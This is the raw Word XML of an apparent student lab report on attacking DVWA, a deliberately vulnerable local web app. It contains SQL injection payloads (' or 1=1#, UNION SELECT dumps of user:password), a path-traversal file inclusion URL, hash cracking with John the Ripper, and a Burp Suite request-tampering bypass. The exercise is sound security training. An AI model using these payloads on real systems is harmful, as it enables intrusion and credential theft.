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B63B3" w14:textId="77777777" w:rsidR="00505C01" w:rsidRDefault="007F417E">
      <w:r>
        <w:t xml:space="preserve">                                                                       Lab 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FCBE64" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E"/>
    <w:p w14:paraId="3020DF9D" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E">
      <w:r>
        <w:t>Initialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F6957" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E">
      <w:r>
        <w:t>Login</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/  setting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the security level low / try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9309B" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9B8A36" wp14:editId="1912424A">
            <wp:extent cx="4501365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4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29" cy="30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5D058" wp14:editId="6496BA66">
            <wp:extent cx="459105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4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27" cy="33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89D9" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0579D3C5" wp14:editId="2DBDD195">
            <wp:extent cx="4197566" cy="30862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EDA5" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E"/>
    <w:p w14:paraId="0E57CC67" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E">
      <w:r>
        <w:t xml:space="preserve">1-list of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59494FD4" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="661E10A0" wp14:editId="2A70BF9D">
            <wp:extent cx="4428630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4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55" cy="31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BA2" w14:textId="17FE8056" w:rsidR="007F417E" w:rsidRDefault="00346D2A">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E3D80" w14:textId="77777777" w:rsidR="008862CD" w:rsidRPr="008862CD" w:rsidRDefault="008862CD" w:rsidP="008862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8862CD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008862CD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1,concat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008862CD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8862CD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user,":",password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008862CD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) From users;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E1A04" w14:textId="77777777" w:rsidR="008862CD" w:rsidRDefault="008862CD"/>
    <w:p w14:paraId="43CA7AF7" w14:textId="77777777" w:rsidR="004B0F70" w:rsidRDefault="004B0F70" w:rsidP="004B0F70"/>
    <w:p w14:paraId="49DC2BF9" w14:textId="77777777" w:rsidR="004B0F70" w:rsidRDefault="004B0F70" w:rsidP="004B0F70"/>
    <w:p w14:paraId="1E8FCBEC" w14:textId="77777777" w:rsidR="00EF6659" w:rsidRDefault="00431A66" w:rsidP="00EF6659">
      <w:r>
        <w:t>2-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8ED5C2" w14:textId="77777777" w:rsidR="00431A66" w:rsidRDefault="00431A66" w:rsidP="004B0F70">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4273BCAE" wp14:editId="6D1A4676">
            <wp:extent cx="5137414" cy="390545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4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2FB8" w14:textId="77777777" w:rsidR="00EF6659" w:rsidRDefault="00EF6659" w:rsidP="004B0F70">
      <w:r>
        <w:t>OR using file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152812F" w14:textId="77777777" w:rsidR="00EF6659" w:rsidRDefault="004B5776" w:rsidP="004B0F70">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../../../../home/kali/Desktop/notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532ABA9" w14:textId="77777777" w:rsidR="004B5776" w:rsidRDefault="004B5776" w:rsidP="004B0F70">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="240E023F" wp14:editId="4878FB96">
            <wp:extent cx="5442230" cy="131451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4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4617" w14:textId="77777777" w:rsidR="004B0F70" w:rsidRDefault="004B0F70" w:rsidP="004B0F70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t>3</w:t>
      </w:r>
      <w:r w:rsidR="007F417E">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004B0F70">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Display the logins and passwords of the users stored in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDB612" w14:textId="77777777" w:rsidR="004B0F70" w:rsidRDefault="004B0F70" w:rsidP="004B0F70">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFEC8F3" w14:textId="77777777" w:rsidR="004B0F70" w:rsidRDefault="004B0F70" w:rsidP="004B0F70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rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command: ‘union select null. Concat(first_name,0x3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a,last</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">_name,0x3a,user,0x3a,password) from users -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FE837" w14:textId="77777777" w:rsidR="004B0F70" w:rsidRDefault="004B0F70" w:rsidP="004B0F70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4587505" wp14:editId="308E1E41">
            <wp:extent cx="4064000" cy="2558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4.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90" cy="25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34B" w14:textId="77777777" w:rsidR="007E755A" w:rsidRDefault="007E755A" w:rsidP="007E755A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051B9445" w14:textId="77777777" w:rsidR="007E755A" w:rsidRDefault="007E755A" w:rsidP="007E755A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  <w:r w:rsidRPr="007E755A">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="007E755A">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The passwords thus recovered by SQL injections are “hashed” (Secure Hash). To be able to determine their values in clear, we will use the John the Ripper software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13BD76" w14:textId="77777777" w:rsidR="007E755A" w:rsidRDefault="007E755A" w:rsidP="007E755A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2B6A7F" wp14:editId="37A15D88">
            <wp:extent cx="4750044" cy="31434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4.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9A8" w14:textId="77777777" w:rsidR="007E755A" w:rsidRDefault="007E755A" w:rsidP="007E755A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</w:p>
    <w:p w14:paraId="1CDD07F1" w14:textId="77777777" w:rsidR="007E755A" w:rsidRPr="007E755A" w:rsidRDefault="007E755A" w:rsidP="007E755A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48E0A9D" wp14:editId="183A0B92">
            <wp:extent cx="4902452" cy="195590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4.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6E15" w14:textId="77777777" w:rsidR="007E755A" w:rsidRPr="007E755A" w:rsidRDefault="007E755A" w:rsidP="004B0F70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</w:p>
    <w:p w14:paraId="4E3A0B0C" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007E755A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DA8E0D" wp14:editId="2C882A11">
            <wp:extent cx="3867349" cy="3105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4.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906" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728"/>
    <w:p w14:paraId="174F009B" w14:textId="77777777" w:rsidR="007F417E" w:rsidRDefault="007F417E"/>
    <w:p w14:paraId="4CD70157" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728"/>
    <w:p w14:paraId="6F5B47EF" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728"/>
    <w:p w14:paraId="1BE39A28" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728"/>
    <w:p w14:paraId="059DAD9A" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728"/>
    <w:p w14:paraId="0D19A1D9" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728"/>
    <w:p w14:paraId="2B62BE73" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728"/>
    <w:p w14:paraId="06311999" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728"/>
    <w:p w14:paraId="24AFB190" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728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lastRenderedPageBreak/>
        <w:t>5-</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5728">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now change the security level of the DVWA platform and put it in medium. How would it be possible to list the list of users by an SQL injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033BB6E2" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5728">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3C037" w14:textId="77777777" w:rsidR="009D5728" w:rsidRPr="009D5728" w:rsidRDefault="009D5728" w:rsidP="009D5728">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/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EC2A17E" wp14:editId="0BBA5E61">
            <wp:extent cx="4870700" cy="3041806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4-low source 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B5BB" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="00807BFF" w:rsidP="009D5728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rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing the query as it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is,without</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> any validations no filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B596CE" w14:textId="77777777" w:rsidR="00807BFF" w:rsidRDefault="00807BFF" w:rsidP="00807BFF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807BFF">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Medium:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76674ECD" w14:textId="77777777" w:rsidR="00807BFF" w:rsidRPr="00807BFF" w:rsidRDefault="00807BFF" w:rsidP="00807BFF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rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It uses http post request and binding to the specific input options like in the pic below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446F2E0" w14:textId="77777777" w:rsidR="00807BFF" w:rsidRPr="009D5728" w:rsidRDefault="00807BFF" w:rsidP="009D5728">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/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C36F9B" wp14:editId="6F9D41E8">
            <wp:extent cx="4737343" cy="245757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4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647F" w14:textId="77777777" w:rsidR="009D5728" w:rsidRDefault="00383146">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF64EBF" wp14:editId="4A380420">
            <wp:extent cx="4978656" cy="323231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4.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5659" w14:textId="77777777" w:rsidR="00383146" w:rsidRDefault="00383146"/>
    <w:p w14:paraId="0C0951A0" w14:textId="77777777" w:rsidR="00383146" w:rsidRDefault="00383146">
      <w:r>
        <w:t xml:space="preserve">However using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burbsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can still display all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>users :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C8D30EE" w14:textId="77777777" w:rsidR="001C598E" w:rsidRPr="001C598E" w:rsidRDefault="001C598E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C598E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To configure Burp suite with firewall:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AF114" w14:textId="77777777" w:rsidR="00383146" w:rsidRDefault="00824B00">
      <w:r>
        <w:t>First enter network settings and configure it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F6534" w14:textId="77777777" w:rsidR="007F5E04" w:rsidRDefault="00824B00" w:rsidP="007F5E04">
      <w:r>
        <w:t xml:space="preserve">Second </w:t>
      </w:r>
      <w:r w:rsidR="001C598E">
        <w:t xml:space="preserve">enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C598E">
        <w:t>about:config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F5E04">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F5E04">
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F5E04">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007F5E04">
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:r w:rsidR="001C598E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> proxy </w:t>
      </w:r>
      <w:r w:rsidR="001C598E">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="007F5E04">
        <w:t>llow and change it to true</w:t>
      </w:r>
      <w:r w:rsidR="007F5E04">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62031A83" wp14:editId="2C1CFA18">
            <wp:extent cx="4381500" cy="35155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4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68" cy="35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6D08" w14:textId="77777777" w:rsidR="007F5E04" w:rsidRDefault="007F5E04" w:rsidP="007F5E04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB330C6" wp14:editId="6B6315C3">
            <wp:extent cx="4362496" cy="2279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4.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54" cy="22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B063" w14:textId="77777777" w:rsidR="007F5E04" w:rsidRDefault="007F5E04" w:rsidP="007F5E04">
      <w:r>
        <w:t>Capture the request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C8FB2" w14:textId="77777777" w:rsidR="007F5E04" w:rsidRDefault="007F5E04" w:rsidP="007F5E04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5346C12A" wp14:editId="5C6D54AD">
            <wp:extent cx="4413250" cy="3255164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4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357" cy="32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F50" w14:textId="77777777" w:rsidR="007F5E04" w:rsidRDefault="007F5E04" w:rsidP="007F5E04"/>
    <w:p w14:paraId="53F82D1F" w14:textId="77777777" w:rsidR="00614AC7" w:rsidRDefault="007F5E04" w:rsidP="00614AC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Modify it and Forward to obtain </w:t>
      </w:r>
      <w:r w:rsidR="00614AC7">
        <w:t>list of users:</w:t>
      </w:r>
      <w:r w:rsidR="00614AC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69566AAE" wp14:editId="33477C63">
            <wp:extent cx="4064000" cy="3452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4.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56" cy="34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EF07" w14:textId="77777777" w:rsidR="00614AC7" w:rsidRDefault="00614AC7" w:rsidP="00614AC7"/>
    <w:p w14:paraId="46C9C78B" w14:textId="77777777" w:rsidR="00614AC7" w:rsidRDefault="00614AC7" w:rsidP="00614AC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587BC060" wp14:editId="1E8FF79F">
            <wp:extent cx="4133850" cy="304783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4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58" cy="30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DD5" w14:textId="77777777" w:rsidR="00431A66" w:rsidRDefault="00431A66" w:rsidP="00614AC7"/>
    <w:p w14:paraId="7C2EA227" w14:textId="77777777" w:rsidR="00431A66" w:rsidRDefault="00431A66" w:rsidP="00614AC7"/>
    <w:p w14:paraId="240FA0D7" w14:textId="77777777" w:rsidR="00431A66" w:rsidRDefault="00431A66" w:rsidP="00431A66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  <w:r>
        <w:t>6-</w:t>
      </w:r>
      <w:r w:rsidRPr="00431A66">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now set the security level to High and check the source code of the corresponding page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A1686" w14:textId="77777777" w:rsidR="00431A66" w:rsidRDefault="00431A66" w:rsidP="00431A66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t>Uses a javascript to send a query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605ED1EB" w14:textId="77777777" w:rsidR="00431A66" w:rsidRDefault="00431A66" w:rsidP="00431A66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Add a limit to the outpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A809E6" w14:textId="77777777" w:rsidR="00431A66" w:rsidRPr="00431A66" w:rsidRDefault="00431A66" w:rsidP="00431A66">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en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41B52F3" wp14:editId="7749F2FD">
            <wp:extent cx="5353325" cy="3930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4.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9B1D" w14:textId="768E845A" w:rsidR="00431A66" w:rsidRPr="00431A66" w:rsidRDefault="00BC4F7F" w:rsidP="00614AC7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4F7F">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547876AB" wp14:editId="2C6D4F45">
            <wp:extent cx="4029637" cy="171473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A66" w:rsidRPr="00431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F7783"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61E2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713ACE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69F66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17E"/>
    <w:rsid w:val="001656DD"/>
    <w:rsid w:val="001C598E"/>
    <w:rsid w:val="00346D2A"/>
    <w:rsid w:val="00383146"/>
    <w:rsid w:val="003911B8"/>
    <w:rsid w:val="00425B8F"/>
    <w:rsid w:val="00431A66"/>
    <w:rsid w:val="004B0F70"/>
    <w:rsid w:val="004B5776"/>
    <w:rsid w:val="00505C01"/>
    <w:rsid w:val="005A6459"/>
    <w:rsid w:val="00614AC7"/>
    <w:rsid w:val="0068297D"/>
    <w:rsid w:val="007E755A"/>
    <w:rsid w:val="007F417E"/>
    <w:rsid w:val="007F5E04"/>
    <w:rsid w:val="00807BFF"/>
    <w:rsid w:val="00824B00"/>
    <w:rsid w:val="008862CD"/>
    <w:rsid w:val="009D5728"/>
    <w:rsid w:val="00BC4F7F"/>
    <w:rsid w:val="00EF6659"/>
    <w:rsid w:val="00F3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60C02"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{67906C0D-3736-460F-958C-F0C4052A0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F70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4B0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10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Mk ammar</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-13T20:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-03T21:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>